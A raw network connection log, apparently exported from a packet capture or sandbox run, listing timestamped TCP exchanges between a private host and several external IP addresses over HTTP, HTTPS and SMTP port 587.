Feb 19, 2025 11:43:22.176848888 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:22.176913023 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:22.176917076 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:22.176985979 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:22.177221060 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:22.177247047 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:22.481812954 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:22.486963987 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:22.487919092 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:22.488171101 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:22.493258953 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:23.459964991 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:23.464862108 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:23.474514008 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:23.820662022 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:23.863507032 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:24.309330940 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.309385061 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.309443951 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.314627886 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.314660072 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.792059898 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.792211056 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.795516968 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.795543909 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.795870066 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.798492908 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.843342066 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.921456099 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.921612978 CET	443	49843	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:24.921813011 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.925988913 CET	49843	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:24.932183027 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:24.938039064 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:25.229101896 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:25.233275890 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.233369112 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.233457088 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.233680964 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.233716965 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.285378933 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.701304913 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.704991102 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.705032110 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.843178034 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.843362093 CET	443	49853	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:25.843597889 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.843852043 CET	49853	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:25.846954107 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.848105907 CET	49855	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.852313995 CET	80	49832	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:25.852374077 CET	49832	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.853121996 CET	80	49855	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:25.853215933 CET	49855	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.853295088 CET	49855	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:25.858264923 CET	80	49855	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:26.314546108 CET	80	49855	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:26.315946102 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.316050053 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.316214085 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.316499949 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.316525936 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.363707066 CET	49855	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:26.792185068 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.796122074 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.796211958 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.926923990 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.927002907 CET	443	49861	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:26.927257061 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.927658081 CET	49861	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:26.931902885 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:26.937066078 CET	80	49867	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:26.937138081 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:26.937212944 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:26.942285061 CET	80	49867	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:27.397555113 CET	80	49867	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:27.399316072 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:27.399379969 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:27.399456978 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:27.399705887 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:27.399722099 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:27.441767931 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:27.877243996 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:27.878950119 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:27.878992081 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:28.014408112 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:28.014492035 CET	443	49868	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:28.014566898 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:28.015045881 CET	49868	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:28.018403053 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:28.019481897 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:28.023646116 CET	80	49867	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:28.023718119 CET	49867	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:28.024480104 CET	80	49874	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:28.024547100 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:28.024626017 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:28.029618979 CET	80	49874	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:28.933218956 CET	80	49874	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:28.934758902 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:28.934859037 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:28.934963942 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:28.935185909 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:28.935214996 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:28.988533974 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.417020082 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:29.418675900 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:29.418761969 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:29.563000917 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:29.563163996 CET	443	49880	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:29.563576937 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:29.563749075 CET	49880	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:29.567030907 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.568108082 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.572320938 CET	80	49874	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:29.572402000 CET	49874	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.573220968 CET	80	49886	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:29.573292017 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.573369980 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:29.578358889 CET	80	49886	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:32.455725908 CET	80	49886	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:32.456959963 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:32.457005978 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:32.457061052 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:32.457573891 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:32.457585096 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:32.504160881 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:32.941243887 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:32.942876101 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:32.942954063 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:33.079025984 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:33.079173088 CET	443	49907	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:33.081425905 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:33.081840038 CET	49907	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:33.085104942 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:33.086200953 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:33.090399027 CET	80	49886	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:33.090470076 CET	49886	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:33.091347933 CET	80	49912	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:33.091470003 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:33.091536999 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:33.096561909 CET	80	49912	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:37.488487005 CET	80	49912	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:37.490004063 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:37.490055084 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:37.490148067 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:37.490415096 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:37.490425110 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:37.535675049 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:37.959693909 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:37.961189985 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:37.961250067 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:38.124917030 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:38.125071049 CET	443	49943	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:38.125133038 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:38.125422001 CET	49943	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:38.128360987 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:38.129108906 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:38.133785963 CET	80	49912	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:38.133965969 CET	49912	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:38.134126902 CET	80	49946	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:38.134191990 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:38.134272099 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:38.139271975 CET	80	49946	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:40.510329008 CET	80	49946	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:40.511778116 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:40.511854887 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:40.511943102 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:40.512260914 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:40.512291908 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:40.551048040 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:40.980997086 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:40.983344078 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:40.983419895 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:41.122241020 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:41.122303009 CET	443	49961	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:41.122407913 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:41.123001099 CET	49961	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:41.126446009 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:41.127680063 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:41.131759882 CET	80	49946	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:41.132872105 CET	80	49967	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:41.132956028 CET	49946	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:41.133009911 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:41.133085966 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:41.138088942 CET	80	49967	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:42.935718060 CET	80	49967	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:42.943854094 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:42.943914890 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:42.943980932 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:42.944230080 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:42.944240093 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:42.988643885 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:43.404299021 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:43.405761957 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:43.405800104 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:43.550869942 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:43.551023960 CET	443	49977	104.21.16.1	192.168.2.4
Feb 19, 2025 11:43:43.551101923 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:43.551577091 CET	49977	443	192.168.2.4	104.21.16.1
Feb 19, 2025 11:43:43.588524103 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:43.594002962 CET	80	49967	193.122.130.0	192.168.2.4
Feb 19, 2025 11:43:43.594120026 CET	49967	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:43.597735882 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:43.597754955 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:43.597899914 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:43.598545074 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:43.598563910 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.224689960 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.224817991 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:44.226463079 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:44.226474047 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.226849079 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.228507042 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:44.271344900 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.468890905 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.468974113 CET	443	49983	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:44.470391989 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:44.471112013 CET	49983	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:50.940324068 CET	49855	80	192.168.2.4	193.122.130.0
Feb 19, 2025 11:43:51.177031040 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:51.182296991 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:51.182387114 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:51.843477964 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:51.843698025 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:51.849308968 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.007817984 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.010478973 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.016010046 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.183402061 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.187798023 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.193485975 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391052008 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391105890 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391145945 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391187906 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391213894 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.391217947 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.391259909 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.441777945 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.482023954 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.501688004 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.507400990 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.666666031 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.670104980 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.676175117 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.834897995 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:52.842936039 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:52.849642992 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.010854006 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.011368036 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.016655922 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.208832979 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.209053040 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.215132952 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.377921104 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.381326914 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.386481047 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.593672991 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.593841076 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.598884106 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.765851974 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.766474009 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.766581059 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.766738892 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.766738892 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.766774893 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.772638083 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772649050 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772658110 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772718906 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772768021 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772834063 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772842884 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.772851944 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.984743118 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:53.986387968 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:53.991738081 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.171463966 CET	587	50025	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.172111034 CET	50025	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:54.172918081 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:54.178031921 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.178744078 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:54.741585970 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.741971016 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:54.747180939 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.909228086 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:54.909555912 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:54.914921045 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.074475050 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.074949026 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.080221891 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271157026 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271183014 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271200895 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271222115 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271234989 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.271368027 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.271368027 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.316813946 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.359791994 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.361305952 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.366542101 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.528707981 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.529504061 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.534632921 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.701035023 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.701459885 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.710037947 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.883610964 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:55.885138035 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:55.891009092 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.104353905 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.107207060 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.112569094 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.279611111 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.279959917 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.287389994 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.475400925 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.475610971 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.481513977 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.639112949 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.639853001 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.639853954 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.639950037 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.639950037 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.640364885 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.645277977 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645292997 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645301104 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645311117 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645345926 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.645385027 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.645580053 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645589113 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645592928 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645601034 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645644903 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.645682096 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:56.645792007 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.650172949 CET	587	50026	199.188.200.194	192.168.2.4
